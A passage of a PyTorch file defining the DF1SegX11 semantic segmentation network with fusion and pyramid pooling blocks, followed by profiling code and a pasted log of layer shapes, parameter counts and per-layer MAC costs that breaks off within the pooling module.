# nn.Conv2d(128, 32, kernel_size=1, bias=False),
# nn.BatchNorm2d(32),
# nn.ReLU(inplace=True),
# nn.ConvTranspose2d(32, 32, 4, stride=2, padding=1, groups=32, bias=False) # lr=0, bilinear
# )
class FuseBlock(nn.Module):
def __init__(self, inplanes, planes):
super(FuseBlock, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.dconv = nn.ConvTranspose2d(planes, planes, kernel_size=4, stride=2, padding=1, groups=planes,
bias=False) # lr=0, bilinear
self.conv2 = nn.Conv2d(planes * 2, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
# self.stride = stride
def forward(self, deep, shallow):
deep = self.conv1(deep)
deep = self.bn1(deep)
deep = self.relu(deep)
# with torch.no_grad():
deep = self.dconv(deep)
fuse = torch.cat([deep, shallow], 1)
fuse = self.conv2(fuse)
fuse = self.bn2(fuse)
fuse = self.relu(fuse)
return fuse
# https://github.com/Lextal/pspnet-pytorch/blob/master/pspnet.py
class PSPModule(nn.Module):
def __init__(self, features=512, out_features=512, sizes=(1, 2, 3, 6)):
super(PSPModule, self).__init__()
n = len(sizes)
self.stages = []
self.stages = nn.ModuleList([self._make_stage(features, size, n) for size in sizes])
self.bottleneck = nn.Conv2d(features + features // n * n, out_features, kernel_size=3, padding=1, bias=False)
self.bn = nn.BatchNorm2d(out_features)
self.relu = nn.ReLU(inplace=True)
def _make_stage(self, features, size, n):
prior = nn.AdaptiveAvgPool2d(output_size=(size, size))
conv = nn.Conv2d(features, features // n, kernel_size=1, bias=False)
bn = nn.BatchNorm2d(features // n)
relu = nn.ReLU(inplace=True)
return nn.Sequential(prior, conv, bn, relu)
def forward(self, x):
h, w = x.size(2), x.size(3)
priors = [F.upsample(input=stage(x), size=(h, w), mode='bilinear') for stage in self.stages] + [x]
out = self.bottleneck(torch.cat(priors, 1))
out = self.bn(out)
return self.relu(out)
class DF1SegX11(nn.Module):
def __init__(self, classes=19):
super(DF1SegX11, self).__init__()
# encode
self.conv1 = nn.Sequential(
nn.Conv2d(3, 3, kernel_size=3, padding=1, stride=1, bias=False),
nn.BatchNorm2d(3),
nn.ReLU(inplace=True),
nn.Conv2d(3, 32, kernel_size=3, padding=1, stride=2, bias=False),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True)
)
self.conv2 = nn.Sequential(
nn.Conv2d(32, 32, kernel_size=3, padding=1, stride=1, bias=False),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, kernel_size=3, padding=1, stride=2, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True)
)
self.inplanes = 64
self.res2 = self._make_layer(64, 3, stride=2)
self.res3 = self._make_layer(128, 3, stride=2)
self.res4_1 = self._make_layer(256, 3, stride=2)
self.res4_2 = self._make_layer(512, 1, stride=1)
self.psp = PSPModule(512, 512, (1, 2, 4, 8))
self.wc3 = nn.Sequential(
nn.Conv2d(64, classes, kernel_size=1, bias=False),
nn.BatchNorm2d(classes),
nn.ReLU(inplace=True)
)
self.wc4 = nn.Sequential(
nn.Conv2d(128, 32, kernel_size=1, bias=False),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True)
)
self.wc5 = nn.Sequential(
nn.Conv2d(512, 128, kernel_size=1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
)
self.dec4 = FuseBlock(128, 32) # fuse wc5 wc4
self.dec3 = FuseBlock(32, classes) # fuse wc4 wc3
self.score = nn.Sequential(
nn.Conv2d(classes, classes, kernel_size=3, padding=1, stride=1, bias=False),
nn.BatchNorm2d(classes),
nn.ReLU(inplace=True)
)
self.score_u8 = nn.ConvTranspose2d(classes, classes, kernel_size=16, padding=4, stride=8, groups=classes,
bias=False)
self._initialize_weights()
# decode
# for m in self.modules():
# if isinstance(m, nn.Conv2d):
# n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
# m.weight.data.normal_(0, math.sqrt(2. / n))
# elif isinstance(m, nn.BatchNorm2d):
# m.weight.data.fill_(1)
# m.bias.data.zero_()
def _make_layer(self, planes, blocks, stride=1):
if stride != 1 or self.inplanes != planes:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes,
kernel_size=stride, stride=stride, bias=False),
nn.BatchNorm2d(planes),
)
else:
downsample = None
layers = list()
layers.append(ResBlock(self.inplanes, planes, stride, downsample))
self.inplanes = planes
for i in range(1, blocks):
layers.append(ResBlock(self.inplanes, planes))
return nn.Sequential(*layers)
def _initialize_weights(self):
for m in self.modules():
# if isinstance(m, nn.Conv2d):
# m.weight.data.zero_()
# if m.bias is not None:
# m.bias.data.zero_()
if isinstance(m, nn.ConvTranspose2d):
assert m.kernel_size[0] == m.kernel_size[1]
initial_weight = get_upsampling_weight(
m.in_channels, m.out_channels//m.groups, m.kernel_size[0])
m.weight.data.copy_(initial_weight)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x_res2 = self.res2(x)
x_res3 = self.res3(x_res2)
x = self.res4_1(x_res3)
x = self.res4_2(x)
x = self.psp(x)
x_wc3 = self.wc3(x_res2)
x_wc4 = self.wc4(x_res3)
x = self.wc5(x)
x = self.dec4(x, x_wc4)
x = self.dec3(x, x_wc3)
x = self.score(x)
# with torch.no_grad():
x = self.score_u8(x)
return x
if __name__ == "__main__":
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = DF1SegX11(classes=19).to(device)
summary(model, (3, 352, 480))
x = torch.randn(2, 3, 512, 1024).to(device)
from fvcore.nn.jit_handles import batchnorm_flop_jit
from fvcore.nn.jit_handles import generic_activation_jit
supported_ops = {
"aten::batch_norm": batchnorm_flop_jit,
}
flop_dict, _ = flop_count(model, (x,), supported_ops)
flops_count, params_count = get_model_complexity_info(model, (3, 512, 1024),
as_strings=False,
print_per_layer_stat=True)
input = x
macs, params = profile(model, inputs=(input,))
print(flop_dict)
print(flops_count, params_count)
print(macs, params)
'''
/home/ethan/anaconda3/envs/py36_cuda101/bin/python /home/ethan/codes/Efficient-Segmentation-Networks/model/DFSegX11.py
/home/ethan/anaconda3/envs/py36_cuda101/lib/python3.6/site-packages/torch/nn/functional.py:2941: UserWarning: nn.functional.upsample is deprecated. Use nn.functional.interpolate instead.
warnings.warn("nn.functional.upsample is deprecated. Use nn.functional.interpolate instead.")
/home/ethan/anaconda3/envs/py36_cuda101/lib/python3.6/site-packages/torch/nn/functional.py:3121: UserWarning: Default upsampling behavior when mode=bilinear is changed to align_corners=False since 0.4.0. Please specify align_corners=True if the old behavior is desired. See the documentation of nn.Upsample for details.
"See the documentation of nn.Upsample for details.".format(mode))
----------------------------------------------------------------
Layer (type) Output Shape Param #
================================================================
Conv2d-1 [-1, 3, 352, 480] 81
BatchNorm2d-2 [-1, 3, 352, 480] 6
ReLU-3 [-1, 3, 352, 480] 0
Conv2d-4 [-1, 32, 176, 240] 864
BatchNorm2d-5 [-1, 32, 176, 240] 64
ReLU-6 [-1, 32, 176, 240] 0
Conv2d-7 [-1, 32, 176, 240] 9,216
BatchNorm2d-8 [-1, 32, 176, 240] 64
ReLU-9 [-1, 32, 176, 240] 0
Conv2d-10 [-1, 64, 88, 120] 18,432
BatchNorm2d-11 [-1, 64, 88, 120] 128
ReLU-12 [-1, 64, 88, 120] 0
Conv2d-13 [-1, 64, 88, 120] 36,864
BatchNorm2d-14 [-1, 64, 88, 120] 128
ReLU-15 [-1, 64, 88, 120] 0
Conv2d-16 [-1, 64, 44, 60] 36,864
BatchNorm2d-17 [-1, 64, 44, 60] 128
ReLU-18 [-1, 64, 44, 60] 0
Conv2d-19 [-1, 64, 44, 60] 36,864
BatchNorm2d-20 [-1, 64, 44, 60] 128
Conv2d-21 [-1, 64, 44, 60] 16,384
BatchNorm2d-22 [-1, 64, 44, 60] 128
ReLU-23 [-1, 64, 44, 60] 0
ResBlock-24 [-1, 64, 44, 60] 0
Conv2d-25 [-1, 64, 44, 60] 36,864
BatchNorm2d-26 [-1, 64, 44, 60] 128
ReLU-27 [-1, 64, 44, 60] 0
Conv2d-28 [-1, 64, 44, 60] 36,864
BatchNorm2d-29 [-1, 64, 44, 60] 128
ReLU-30 [-1, 64, 44, 60] 0
ResBlock-31 [-1, 64, 44, 60] 0
Conv2d-32 [-1, 64, 44, 60] 36,864
BatchNorm2d-33 [-1, 64, 44, 60] 128
ReLU-34 [-1, 64, 44, 60] 0
Conv2d-35 [-1, 64, 44, 60] 36,864
BatchNorm2d-36 [-1, 64, 44, 60] 128
ReLU-37 [-1, 64, 44, 60] 0
ResBlock-38 [-1, 64, 44, 60] 0
Conv2d-39 [-1, 64, 44, 60] 36,864
BatchNorm2d-40 [-1, 64, 44, 60] 128
ReLU-41 [-1, 64, 44, 60] 0
Conv2d-42 [-1, 128, 22, 30] 73,728
BatchNorm2d-43 [-1, 128, 22, 30] 256
ReLU-44 [-1, 128, 22, 30] 0
Conv2d-45 [-1, 128, 22, 30] 147,456
BatchNorm2d-46 [-1, 128, 22, 30] 256
Conv2d-47 [-1, 128, 22, 30] 32,768
BatchNorm2d-48 [-1, 128, 22, 30] 256
ReLU-49 [-1, 128, 22, 30] 0
ResBlock-50 [-1, 128, 22, 30] 0
Conv2d-51 [-1, 128, 22, 30] 147,456
BatchNorm2d-52 [-1, 128, 22, 30] 256
ReLU-53 [-1, 128, 22, 30] 0
Conv2d-54 [-1, 128, 22, 30] 147,456
BatchNorm2d-55 [-1, 128, 22, 30] 256
ReLU-56 [-1, 128, 22, 30] 0
ResBlock-57 [-1, 128, 22, 30] 0
Conv2d-58 [-1, 128, 22, 30] 147,456
BatchNorm2d-59 [-1, 128, 22, 30] 256
ReLU-60 [-1, 128, 22, 30] 0
Conv2d-61 [-1, 128, 22, 30] 147,456
BatchNorm2d-62 [-1, 128, 22, 30] 256
ReLU-63 [-1, 128, 22, 30] 0
ResBlock-64 [-1, 128, 22, 30] 0
Conv2d-65 [-1, 128, 22, 30] 147,456
BatchNorm2d-66 [-1, 128, 22, 30] 256
ReLU-67 [-1, 128, 22, 30] 0
Conv2d-68 [-1, 256, 11, 15] 294,912
BatchNorm2d-69 [-1, 256, 11, 15] 512
ReLU-70 [-1, 256, 11, 15] 0
Conv2d-71 [-1, 256, 11, 15] 589,824
BatchNorm2d-72 [-1, 256, 11, 15] 512
Conv2d-73 [-1, 256, 11, 15] 131,072
BatchNorm2d-74 [-1, 256, 11, 15] 512
ReLU-75 [-1, 256, 11, 15] 0
ResBlock-76 [-1, 256, 11, 15] 0
Conv2d-77 [-1, 256, 11, 15] 589,824
BatchNorm2d-78 [-1, 256, 11, 15] 512
ReLU-79 [-1, 256, 11, 15] 0
Conv2d-80 [-1, 256, 11, 15] 589,824
BatchNorm2d-81 [-1, 256, 11, 15] 512
ReLU-82 [-1, 256, 11, 15] 0
ResBlock-83 [-1, 256, 11, 15] 0
Conv2d-84 [-1, 256, 11, 15] 589,824
BatchNorm2d-85 [-1, 256, 11, 15] 512
ReLU-86 [-1, 256, 11, 15] 0
Conv2d-87 [-1, 256, 11, 15] 589,824
BatchNorm2d-88 [-1, 256, 11, 15] 512
ReLU-89 [-1, 256, 11, 15] 0
ResBlock-90 [-1, 256, 11, 15] 0
Conv2d-91 [-1, 512, 11, 15] 1,179,648
BatchNorm2d-92 [-1, 512, 11, 15] 1,024
ReLU-93 [-1, 512, 11, 15] 0
Conv2d-94 [-1, 512, 11, 15] 2,359,296
BatchNorm2d-95 [-1, 512, 11, 15] 1,024
Conv2d-96 [-1, 512, 11, 15] 131,072
BatchNorm2d-97 [-1, 512, 11, 15] 1,024
ReLU-98 [-1, 512, 11, 15] 0
ResBlock-99 [-1, 512, 11, 15] 0
AdaptiveAvgPool2d-100 [-1, 512, 1, 1] 0
Conv2d-101 [-1, 128, 1, 1] 65,536
BatchNorm2d-102 [-1, 128, 1, 1] 256
ReLU-103 [-1, 128, 1, 1] 0
AdaptiveAvgPool2d-104 [-1, 512, 2, 2] 0
Conv2d-105 [-1, 128, 2, 2] 65,536
BatchNorm2d-106 [-1, 128, 2, 2] 256
ReLU-107 [-1, 128, 2, 2] 0
AdaptiveAvgPool2d-108 [-1, 512, 4, 4] 0
Conv2d-109 [-1, 128, 4, 4] 65,536
BatchNorm2d-110 [-1, 128, 4, 4] 256
ReLU-111 [-1, 128, 4, 4] 0
AdaptiveAvgPool2d-112 [-1, 512, 8, 8] 0
Conv2d-113 [-1, 128, 8, 8] 65,536
BatchNorm2d-114 [-1, 128, 8, 8] 256
ReLU-115 [-1, 128, 8, 8] 0
Conv2d-116 [-1, 512, 11, 15] 4,718,592
BatchNorm2d-117 [-1, 512, 11, 15] 1,024
ReLU-118 [-1, 512, 11, 15] 0
PSPModule-119 [-1, 512, 11, 15] 0
Conv2d-120 [-1, 19, 44, 60] 1,216
BatchNorm2d-121 [-1, 19, 44, 60] 38
ReLU-122 [-1, 19, 44, 60] 0
Conv2d-123 [-1, 32, 22, 30] 4,096
BatchNorm2d-124 [-1, 32, 22, 30] 64
ReLU-125 [-1, 32, 22, 30] 0
Conv2d-126 [-1, 128, 11, 15] 65,536
BatchNorm2d-127 [-1, 128, 11, 15] 256
ReLU-128 [-1, 128, 11, 15] 0
Conv2d-129 [-1, 32, 11, 15] 4,096
BatchNorm2d-130 [-1, 32, 11, 15] 64
ReLU-131 [-1, 32, 11, 15] 0
ConvTranspose2d-132 [-1, 32, 22, 30] 512
Conv2d-133 [-1, 32, 22, 30] 18,432
BatchNorm2d-134 [-1, 32, 22, 30] 64
ReLU-135 [-1, 32, 22, 30] 0
FuseBlock-136 [-1, 32, 22, 30] 0
Conv2d-137 [-1, 19, 22, 30] 608
BatchNorm2d-138 [-1, 19, 22, 30] 38
ReLU-139 [-1, 19, 22, 30] 0
ConvTranspose2d-140 [-1, 19, 44, 60] 304
Conv2d-141 [-1, 19, 44, 60] 6,498
BatchNorm2d-142 [-1, 19, 44, 60] 38
ReLU-143 [-1, 19, 44, 60] 0
FuseBlock-144 [-1, 19, 44, 60] 0
Conv2d-145 [-1, 19, 44, 60] 3,249
BatchNorm2d-146 [-1, 19, 44, 60] 38
ReLU-147 [-1, 19, 44, 60] 0
ConvTranspose2d-148 [-1, 19, 352, 480] 4,864
================================================================
Total params: 13,479,154
Trainable params: 13,479,154
Non-trainable params: 0
----------------------------------------------------------------
Input size (MB): 1.93
Forward/backward pass size (MB): 201.94
Params size (MB): 51.42
Estimated Total Size (MB): 255.29
----------------------------------------------------------------
Skipped operation aten::relu_ 40 time(s)
Skipped operation aten::add_ 10 time(s)
Skipped operation aten::adaptive_avg_pool2d 4 time(s)
Skipped operation aten::upsample_bilinear2d 4 time(s)
DF1SegX11(
13.765 GMac, 100.000% MACs,
(conv1): Sequential(
0.173 GMac, 1.257% MACs,
(0): Conv2d(0.042 GMac, 0.309% MACs, 3, 3, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(1): BatchNorm2d(0.003 GMac, 0.023% MACs, 3, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(0.002 GMac, 0.011% MACs, inplace=True)
(3): Conv2d(0.113 GMac, 0.823% MACs, 3, 32, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(4): BatchNorm2d(0.008 GMac, 0.061% MACs, 32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(5): ReLU(0.004 GMac, 0.030% MACs, inplace=True)
)
(conv2): Sequential(
1.831 GMac, 13.300% MACs,
(0): Conv2d(1.208 GMac, 8.775% MACs, 32, 32, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(1): BatchNorm2d(0.008 GMac, 0.061% MACs, 32, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(2): ReLU(0.004 GMac, 0.030% MACs, inplace=True)
(3): Conv2d(0.604 GMac, 4.388% MACs, 32, 64, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(4): BatchNorm2d(0.004 GMac, 0.030% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(5): ReLU(0.002 GMac, 0.015% MACs, inplace=True)
)
(res2): Sequential(
3.171 GMac, 23.035% MACs,
(0): ResBlock(
1.957 GMac, 14.214% MACs,
(conv00): Conv2d(1.208 GMac, 8.775% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.004 GMac, 0.030% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.0 GMac, 0.000% MACs, 64, 64, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.000% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.003 GMac, 0.023% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
0.135 GMac, 0.983% MACs,
(0): Conv2d(0.134 GMac, 0.975% MACs, 64, 64, kernel_size=(2, 2), stride=(2, 2), bias=False)
(1): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(1): ResBlock(
0.607 GMac, 4.411% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 64, 64, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.008% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(2): ResBlock(
0.607 GMac, 4.411% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 64, 64, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.008% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(res3): Sequential(
2.037 GMac, 14.797% MACs,
(0): ResBlock(
0.826 GMac, 5.999% MACs,
(conv00): Conv2d(0.302 GMac, 2.194% MACs, 64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.001 GMac, 0.008% MACs, 64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.151 GMac, 1.097% MACs, 64, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.0 GMac, 0.000% MACs, 64, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.008% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
0.068 GMac, 0.491% MACs,
(0): Conv2d(0.067 GMac, 0.488% MACs, 64, 128, kernel_size=(2, 2), stride=(2, 2), bias=False)
(1): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(1): ResBlock(
0.606 GMac, 4.399% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 128, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.302 GMac, 2.194% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.004% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(2): ResBlock(
0.606 GMac, 4.399% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 128, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.302 GMac, 2.194% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.004% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(res4_1): Sequential(
2.033 GMac, 14.772% MACs,
(0): ResBlock(
0.824 GMac, 5.985% MACs,
(conv00): Conv2d(0.302 GMac, 2.194% MACs, 128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.001 GMac, 0.004% MACs, 128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.151 GMac, 1.097% MACs, 128, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.0 GMac, 0.000% MACs, 128, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.000% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.004% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
0.067 GMac, 0.489% MACs,
(0): Conv2d(0.067 GMac, 0.488% MACs, 128, 256, kernel_size=(2, 2), stride=(2, 2), bias=False)
(1): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(1): ResBlock(
0.605 GMac, 4.393% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 256, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.302 GMac, 2.194% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.0 GMac, 0.002% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
(2): ResBlock(
0.605 GMac, 4.393% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 256, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.302 GMac, 2.194% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.0 GMac, 0.002% MACs, inplace=True)
(conv2): Conv2d(0.302 GMac, 2.194% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.0 GMac, 0.002% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
(res4_2): Sequential(
1.881 GMac, 13.666% MACs,
(0): ResBlock(
1.881 GMac, 13.666% MACs,
(conv00): Conv2d(0.0 GMac, 0.000% MACs, 256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn00): BatchNorm2d(0.0 GMac, 0.000% MACs, 256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv01): Conv2d(0.0 GMac, 0.000% MACs, 256, 512, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), bias=False)
(bn01): BatchNorm2d(0.0 GMac, 0.000% MACs, 512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(conv1): Conv2d(0.604 GMac, 4.388% MACs, 256, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn1): BatchNorm2d(0.001 GMac, 0.004% MACs, 512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(relu): ReLU(0.001 GMac, 0.004% MACs, inplace=True)
(conv2): Conv2d(1.208 GMac, 8.775% MACs, 512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
(bn2): BatchNorm2d(0.001 GMac, 0.004% MACs, 512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
(downsample): Sequential(
0.068 GMac, 0.491% MACs,
(0): Conv2d(0.067 GMac, 0.488% MACs, 256, 512, kernel_size=(1, 1), stride=(1, 1), bias=False)
(1): BatchNorm2d(0.001 GMac, 0.004% MACs, 512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
)
)
)
(psp): PSPModule(
2.423 GMac, 17.605% MACs,
(stages): ModuleList(
